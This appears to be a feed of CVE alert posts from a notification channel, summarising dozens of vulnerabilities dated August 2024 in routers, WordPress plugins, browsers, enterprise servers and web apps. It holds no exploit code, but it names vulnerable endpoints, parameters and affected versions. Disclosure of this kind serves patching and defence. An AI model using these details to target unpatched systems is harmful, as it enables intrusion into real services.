🚨 CVE-2024-39549A Missing Release of Memory after Effective Lifetime vulnerability in the routing process daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an attacker to send a malformed BGP Path attribute update which allocates memory used to log the bad path attribute. This memory is not properly freed in all circumstances, leading to a Denial of Service (DoS).Consumed memory can be freed by manually restarting Routing Protocol Daemon (rpd).Memory utilization could be monitored by: user@host> show system memory or show system monitor memory statusThis issue affects:Junos OS: * All versions before 21.2R3-S8, * from 21.4 before 21.4R3-S8, * from 22.2 before 22.2R3-S4, * from 22.3 before 22.3R3-S3, * from 22.4 before 22.4R3-S3, * from 23.2 before 23.2R2-S1, * from 23.4 before 23.4R1-S2, 23.4R2, * from 24.2 before 24.2R2-EVO.Junos OS Evolved: * All versions before 21.2R3-S8-EVO, * from 21.4 before 21.4R3-S8-EVO, * from 22.2 before 22.2R3-S4-EVO, * from 22.3 before 22.3R3-S3-EVO, * from 22.4 before 22.4R3-S3-EVO, * from 23.2 before 23.2R2-S1-EVO, * from 23.4 before 23.4R1-S2, 23.4R2, * from 24.2 before 24.2R2-EVO.🎖@cveNotify |
|
| 2024-08-15 14:37:25 |
🚨 CVE-2024-25196Open Robotics Robotic Operating Sytstem 2 (ROS2) and Nav2 humble versions were discovered to contain a buffer overflow via the nav2_controller process. This vulnerability is triggerd via sending a crafted .yaml file.🎖@cveNotify |
|
| 2024-08-15 14:07:31 |
🚨 CVE-2024-42477llama.cpp provides LLM inference in C/C++. The unsafe `type` member in the `rpc_tensor` structure can cause `global-buffer-overflow`. This vulnerability may lead to memory data leakage. The vulnerability is fixed in b3561.🎖@cveNotify |
|
| 2024-08-15 14:07:30 |
🚨 CVE-2024-40481A Stored Cross Site Scripting (XSS) vulnerability was found in "/admin/view-enquiry.php" in PHPGurukul Old Age Home Management System v1.0, which allows remote attackers to execute arbitrary code via the Contact Us page "message" parameter.🎖@cveNotify |
|
| 2024-08-15 14:07:26 |
🚨 CVE-2024-40476A Cross-Site Request Forgery (CSRF) vulnerability was found in SourceCodester Best House Rental Management System v1.0. This could lead to an attacker tricking the administrator into adding/modifying/deleting valid tenant data via a crafted HTML page, as demonstrated by a Delete Tenant action at the /rental/ajax.php?action=delete_tenant.🎖@cveNotify |
|
| 2024-08-15 14:07:25 |
🚨 CVE-2024-40474A Reflected Cross Site Scripting (XSS) vulnerability was found in "edit-cate.php" in SourceCodester House Rental Management System v1.0.🎖@cveNotify |
|
| 2024-08-15 14:07:24 |
🚨 CVE-2024-40473A Stored Cross Site Scripting (XSS) vulnerability was found in "manage_houses.php" in SourceCodester Best House Rental Management System v1.0. It allows remote attackers to execute arbitrary code via "House_no" and "Description" parameter fields.🎖@cveNotify |
|
| 2024-08-15 13:37:36 |
🚨 CVE-2024-7831** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814 and classified as critical. Affected by this vulnerability is the function cgi_get_cooliris of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument path leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 13:37:35 |
🚨 CVE-2024-7830** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. Affected is the function cgi_move_photo of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument photo_name leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 13:37:32 |
🚨 CVE-2024-7829** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20240814. This issue affects the function cgi_del_photo of the file /cgi-bin/photocenter_mgr.cgi. The manipulation of the argument current_path leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-08-15 13:37:31 |
🚨 CVE-2024-40472Sourcecodester Daily Calories Monitoring Tool v1.0 is vulnerable to SQL Injection via "delete-calorie.php."🎖@cveNotify |
|
| 2024-08-15 13:37:30 |
🚨 CVE-2024-7464A vulnerability, which was classified as critical, has been found in TOTOLINK CP900 6.3c.566. This issue affects the function setTelnetCfg of the component Telnet Service. The manipulation of the argument telnet_enabled leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273557 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-15 13:37:26 |
🚨 CVE-2024-7462A vulnerability classified as critical has been found in TOTOLINK N350RT 9.3.5u.6139_B20201216. This affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ssid leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273555. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-15 13:37:25 |
🚨 CVE-2024-41254An issue was discovered in litestream v0.3.13. The usage of the ssh.InsecureIgnoreHostKey() disables host key verification, possibly allowing attackers to obtain sensitive information via a man-in-the-middle attack.🎖@cveNotify |
|
| 2024-08-15 13:07:43 |
🚨 CVE-2024-42360SequenceServer lets you rapidly set up a BLAST+ server with an intuitive user interface for personal or group use. Several HTTP endpoints did not properly sanitize user input and/or query parameters. This could be exploited to inject and run unwanted shell commands. This vulnerability has been fixed in 3.1.2.🎖@cveNotify |
|
| 2024-08-15 13:07:42 |
🚨 CVE-2024-27120A Local File Inclusion vulnerability has been found in ComfortKey, a product of Celsius Benelux. Using this vulnerability, an unauthenticated attacker may retrieve sensitive information about the underlying system. The vulnerability has been remediated in version 24.1.2.🎖@cveNotify |
|
| 2024-08-15 13:07:38 |
🚨 CVE-2024-7792A vulnerability was found in SourceCodester Task Progress Tracker 1.0. It has been classified as critical. Affected is an unknown function of the file /endpoint/delete-task.php. The manipulation of the argument task leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 13:07:37 |
🚨 CVE-2024-37529IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 could allow an authenticated user to cause a denial of service with a specially crafted query due to improper memory allocation. IBM X-Force ID: 294295.🎖@cveNotify |
|
| 2024-08-15 13:07:36 |
🚨 CVE-2024-35136IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) federated server 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query under certain conditions. IBM X-Force ID: 291307.🎖@cveNotify |
|
| 2024-08-15 13:07:35 |
🚨 CVE-2024-31882IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user. IBM X-Force ID: 287614.🎖@cveNotify |
|
| 2024-08-15 13:07:32 |
🚨 CVE-2023-50314IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.8 could allow an attacker with access to the network to conduct spoofing attacks. An attacker could exploit this vulnerability using a certificate issued by a trusted authority to obtain sensitive information. IBM X-Force ID: 274713.🎖@cveNotify |
|
| 2024-08-15 13:07:31 |
🚨 CVE-2020-28242An issue was discovered in Asterisk Open Source 13.x before 13.37.1, 16.x before 16.14.1, 17.x before 17.8.1, and 18.x before 18.0.1 and Certified Asterisk before 16.8-cert5. If Asterisk is challenged on an outbound INVITE and the nonce is changed in each response, Asterisk will continually send INVITEs in a loop. This causes Asterisk to consume more and more memory since the transaction will never terminate (even if the call is hung up), ultimately leading to a restart or shutdown of Asterisk. Outbound authentication must be configured on the endpoint for this to occur.🎖@cveNotify |
|
| 2024-08-15 13:07:30 |
🚨 CVE-2009-3723asterisk allows calls on prohibited networks🎖@cveNotify |
|
| 2024-08-15 13:07:27 |
🚨 CVE-2018-12228An issue was discovered in Asterisk Open Source 15.x before 15.4.1. When connected to Asterisk via TCP/TLS, if the client abruptly disconnects, or sends a specially crafted message, then Asterisk gets caught in an infinite loop while trying to read the data stream. This renders the system unusable.🎖@cveNotify |
|
| 2024-08-15 13:07:26 |
🚨 CVE-2012-2186Incomplete blacklist vulnerability in main/manager.c in Asterisk Open Source 1.8.x before 1.8.15.1 and 10.x before 10.7.1, Certified Asterisk 1.8.11 before 1.8.11-cert6, Asterisk Digiumphones 10.x.x-digiumphones before 10.7.1-digiumphones, and Asterisk Business Edition C.3.x before C.3.7.6 allows remote authenticated users to execute arbitrary commands by leveraging originate privileges and providing an ExternalIVR value in an AMI Originate action.🎖@cveNotify |
|
| 2024-08-15 13:07:25 |
🚨 CVE-2009-2346The IAX2 protocol implementation in Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.2, 1.6.0.x before 1.6.0.15, and 1.6.1.x before 1.6.1.6; Business Edition B.x.x before B.2.5.10, C.2.x before C.2.4.3, and C.3.x before C.3.1.1; and s800i 1.3.x before 1.3.0.3 allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many IAX2 message exchanges, a related issue to CVE-2008-3263.🎖@cveNotify |
|
| 2024-08-15 08:37:25 |
🚨 CVE-2024-7411The Newsletters plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 4.9.9. This is due the plugin not preventing direct access to the /vendor/mobiledetect/mobiledetectlib/export/exportToJSON.php. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-08-15 08:37:24 |
🚨 CVE-2024-43275Cross-Site Request Forgery (CSRF) vulnerability in Xyzscripts Insert PHP Code Snippet.This issue affects Insert PHP Code Snippet: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-08-15 06:37:26 |
🚨 CVE-2024-7064The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-15 06:37:24 |
🚨 CVE-2024-7063The ElementsKit Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.6 via the 'render_raw' function. This can allow authenticated attackers, with Contributor-level permissions and above, to extract sensitive data including private, future, and draft posts.🎖@cveNotify |
|
| 2024-08-15 04:37:26 |
🚨 CVE-2024-7815A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin-update-employee.php of the component Update Employee Page. The manipulation of the argument emp_fname /emp_lname /emp_nat_idno/emp_addr leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 04:37:25 |
🚨 CVE-2024-6534Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.🎖@cveNotify |
|
| 2024-08-15 03:37:30 |
🚨 CVE-2024-7811A vulnerability classified as critical has been found in SourceCodester Daily Expenses Monitoring App 1.0. This affects an unknown part of the file /endpoint/delete-expense.php. The manipulation of the argument expense leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 03:37:26 |
🚨 CVE-2024-7624The Zephyr Project Manager plugin for WordPress is vulnerable to limited privilege escalation in all versions up to, and including, 3.3.101. This is due to the plugin not properly checking a users capabilities before allowing them to enable access to the plugin's settings through the update_user_access() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to grant themselves full access to the plugin's settings.🎖@cveNotify |
|
| 2024-08-15 03:37:25 |
🚨 CVE-2024-6533Directus v10.13.0 allows an authenticated external attacker to execute arbitrary JavaScript on the client. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with CVE-2024-6534, it could result in account takeover.🎖@cveNotify |
|
| 2024-08-15 03:37:24 |
🚨 CVE-2024-25024IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 281430.🎖@cveNotify |
|
| 2024-08-15 02:37:25 |
🚨 CVE-2024-7810A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /tracking/admin/view_itprofile.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 02:37:24 |
🚨 CVE-2024-7809A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /tracking/nbproject/. The manipulation leads to exposure of information through directory listing. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 01:37:24 |
🚨 CVE-2024-7808A vulnerability was found in code-projects Job Portal 1.0. It has been classified as critical. Affected is an unknown function of the file logindbc.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 00:37:26 |
🚨 CVE-2024-7800A vulnerability classified as critical has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file /simple-online-bidding-system/bidding/admin/ajax.php?action=delete_product. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 00:37:25 |
🚨 CVE-2024-7797A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. Affected is an unknown function of the file /simple-online-bidding-system/bidding/admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-15 00:37:24 |
🚨 CVE-2024-7625In HashiCorp Nomad and Nomad Enterprise from 0.6.1 up to 1.16.13, 1.7.10, and 1.8.2, the archive unpacking process is vulnerable to writes outside the allocation directory during migration of allocation directories when multiple archive headers target the same file. This vulnerability, CVE-2024-7625, is fixed in Nomad 1.6.14, 1.7.11, and 1.8.3. Access or compromise of the Nomad client agent at the source allocation first is a prerequisite for leveraging this vulnerability.🎖@cveNotify |
|
| 2024-08-14 21:37:36 |
🚨 CVE-2024-7794A vulnerability was found in itsourcecode Vehicle Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file mybill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-08-14 21:37:32 |
🚨 CVE-2024-42353WebOb provides objects for HTTP requests and responses. When WebOb normalizes the HTTP Location header to include the request hostname, it does so by parsing the URL that the user is to be redirected to with Python's urlparse, and joining it to the base URL. `urlparse` however treats a `//` at the start of a string as a URI without a scheme, and then treats the next part as the hostname. `urljoin` will then use that hostname from the second part as the hostname replacing the original one from the request. This vulnerability is patched in WebOb version 1.8.8.🎖@cveNotify |
|
| 2024-08-14 21:37:31 |
🚨 CVE-2024-41651An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality.🎖@cveNotify |
|
| 2024-08-14 21:37:30 |
🚨 CVE-2024-21823Hardware logic with insecure de-synchronization in Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors may allow an authorized user to potentially enable escalation of privilege local access🎖@cveNotify |
|
| 2024-08-14 21:37:26 |
🚨 CVE-2024-22009In init_data of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-14 21:37:25 |
🚨 CVE-2023-22305Integer overflow in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-08-14 21:37:24 |
🚨 CVE-2022-41700Insecure inherited permissions in some Intel(R) NUC Pro Software Suite installation software before version 2.0.0.9 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-08-14 20:37:32 |
🚨 CVE-2020-17519A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.🎖@cveNotify |
|
| 2024-08-14 20:37:26 |
🚨 CVE-2020-13927The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default🎖@cveNotify |
|
| 2024-08-14 20:37:25 |
🚨 CVE-2020-13965An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.🎖@cveNotify |
|
| 2024-08-14 20:37:24 |
🚨 CVE-2017-3506Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).🎖@cveNotify |
|
| 2024-08-14 20:07:44 |
🚨 CVE-2024-0519Out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-14 20:07:38 |
🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2024-08-14 20:07:37 |
🚨 CVE-2023-34048vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds write potentially leading to remote code execution.🎖@cveNotify |
|
| 2024-08-14 20:07:36 |
🚨 CVE-2023-41763Skype for Business Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 20:07:32 |
🚨 CVE-2023-4762Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-14 20:07:31 |
🚨 CVE-2023-23376Windows Common Log File System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 20:07:26 |
🚨 CVE-2022-3038Use after free in Network Service in Google Chrome prior to 105.0.5195.52 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-08-14 20:07:25 |
🚨 CVE-2021-36380Sunhillo SureLine before 8.7.0.1.1 allows Unauthenticated OS Command Injection via shell metacharacters in ipAddr or dnsAddr /cgi/networkDiag.cgi.🎖@cveNotify |
|
| 2024-08-14 19:37:44 |
🚨 CVE-2022-32507An issue was discovered on certain Nuki Home Solutions devices. Some BLE commands, which should have been designed to be only called from privileged accounts, could also be called from unprivileged accounts. This demonstrates that no access controls were implemented for the different BLE commands across the different accounts. This affects Nuki Smart Lock 3.0 before 3.3.5 and Nuki Smart Lock 2.0 before 2.12.4.🎖@cveNotify |
|
| 2024-08-14 19:37:43 |
🚨 CVE-2024-27683D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function hnap_main. An attacker can send a POST request to trigger the vulnerablilify.🎖@cveNotify |
|
| 2024-08-14 19:07:26 |
🚨 CVE-2024-41829In JetBrains TeamCity before 2024.07 an OAuth code for JetBrains Space could be stolen via Space Application connection🎖@cveNotify |
|
| 2024-08-14 18:37:25 |
🚨 CVE-2024-41710A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, including the 6970 Conference Unit, through R6.4.0.HF1 (R6.4.0.136) could allow an authenticated attacker with administrative privilege to conduct an argument injection attack, due to insufficient parameter sanitization during the boot process. A successful exploit could allow an attacker to execute arbitrary commands within the context of the system.🎖@cveNotify |
|
| 2024-08-14 18:37:24 |
🚨 CVE-2024-34310Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.🎖@cveNotify |
|
| 2024-08-14 17:37:41 |
🚨 CVE-2024-42434Sensitive information disclosure in some Zoom Workplace Apps, SDKs, Rooms Clients, and Rooms Controllers may allow a privileged user to conduct an information disclosure via network access.🎖@cveNotify |
|
| 2024-08-14 17:37:40 |
🚨 CVE-2024-39824Sensitive information disclosure in some Zoom Workplace Apps, SDKs, Rooms Clients, and Rooms Controllers may allow a privileged user to conduct an information disclosure via network access.🎖@cveNotify |
|
| 2024-08-14 17:37:36 |
🚨 CVE-2024-39818Protection mechanism failure for some Zoom Workplace Apps and SDKs may allow an authenticated user to conduct information disclosure via network access.🎖@cveNotify |
|
| 2024-08-14 17:37:35 |
🚨 CVE-2024-28986SolarWinds Web Help Desk was found to be susceptible to a Java Deserialization Remote Code Execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. While it was reported as an unauthenticated vulnerability, SolarWinds has been unable to reproduce it without authentication after thorough testing. However, out of an abundance of caution, we recommend all Web Help Desk customers apply the patch, which is now available.🎖@cveNotify |
|
| 2024-08-14 17:37:31 |
🚨 CVE-2024-40051IP Guard v4.81.0307.0 was discovered to contain an arbitrary file read vulnerability via the file name parameter.🎖@cveNotify |
|
| 2024-08-14 17:37:30 |
🚨 CVE-2024-38755Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Designinvento DirectoryPress allows SQL Injection.This issue affects DirectoryPress: from n/a through 3.6.10.🎖@cveNotify |
|
| 2024-08-14 17:37:29 |
🚨 CVE-2024-38730Server-Side Request Forgery (SSRF) vulnerability in Noor alam Magical Addons For Elementor.This issue affects Magical Addons For Elementor: from n/a through 1.1.41.🎖@cveNotify |
|
| 2024-08-14 17:37:26 |
🚨 CVE-2024-38728Server-Side Request Forgery (SSRF) vulnerability in Seraphinite Solutions Seraphinite Post .DOCX Source.This issue affects Seraphinite Post .DOCX Source: from n/a through 2.16.9.🎖@cveNotify |
|
| 2024-08-14 17:37:25 |
🚨 CVE-2023-52155A SQL Injection vulnerability in /admin/sauvegarde/run.php in PMB 7.4.7 and earlier allows remote authenticated attackers to execute arbitrary SQL commands via the sauvegardes variable through the /admin/sauvegarde/run.php endpoint.🎖@cveNotify |
|
| 2024-08-14 17:37:24 |
🚨 CVE-2023-50094reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.🎖@cveNotify |
|
| 2024-08-14 17:07:41 |
🚨 CVE-2024-38692Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Spiffy Plugins Spiffy Calendar allows SQL Injection.This issue affects Spiffy Calendar: from n/a through 4.9.11.🎖@cveNotify |
|
| 2024-08-14 17:07:37 |
🚨 CVE-2024-37942Server-Side Request Forgery (SSRF) vulnerability in Berqier Ltd BerqWP.This issue affects BerqWP: from n/a through 1.7.5.🎖@cveNotify |
|
| 2024-08-14 17:07:36 |
🚨 CVE-2024-23692Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.🎖@cveNotify |
|
| 2024-08-14 17:07:35 |
🚨 CVE-2024-5274Type Confusion in V8 in Google Chrome prior to 125.0.6422.112 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-14 17:07:32 |
🚨 CVE-2024-4947Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-14 17:07:31 |
🚨 CVE-2024-4671Use after free in Visuals in Google Chrome prior to 124.0.6367.201 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-14 17:07:30 |
🚨 CVE-2024-29745there is a possible Information Disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-14 17:07:26 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, tvOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-08-14 17:07:25 |
🚨 CVE-2023-47246In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.🎖@cveNotify |
|
| 2024-08-14 17:07:24 |
🚨 CVE-2023-4966Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.🎖@cveNotify |
|
| 2024-08-14 16:37:24 |
🚨 CVE-2024-26349flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_translation.php🎖@cveNotify |
|
| 2024-08-14 16:07:25 |
🚨 CVE-2023-35860A Directory Traversal vulnerability in Modern Campus - Omni CMS 2023.1 allows a remote, unauthenticated attacker to enumerate file system information via the dir parameter to listing.php or rss.php.🎖@cveNotify |
|
| 2024-08-14 16:07:24 |
🚨 CVE-2023-34362In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.🎖@cveNotify |
|
| 2024-08-14 15:37:45 |
🚨 CVE-2022-48618The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.1, watchOS 9.2, iOS 16.2 and iPadOS 16.2, tvOS 16.2. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. Apple is aware of a report that this issue may have been exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2024-08-14 15:37:44 |
🚨 CVE-2023-36033Windows DWM Core Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 15:37:43 |
🚨 CVE-2023-36563Microsoft WordPad Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-08-14 15:37:39 |
🚨 CVE-2023-43770Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.🎖@cveNotify |
|
| 2024-08-14 15:37:38 |
🚨 CVE-2023-36802Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-08-14 15:37:37 |
🚨 CVE-2023-38035A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.🎖@cveNotify |
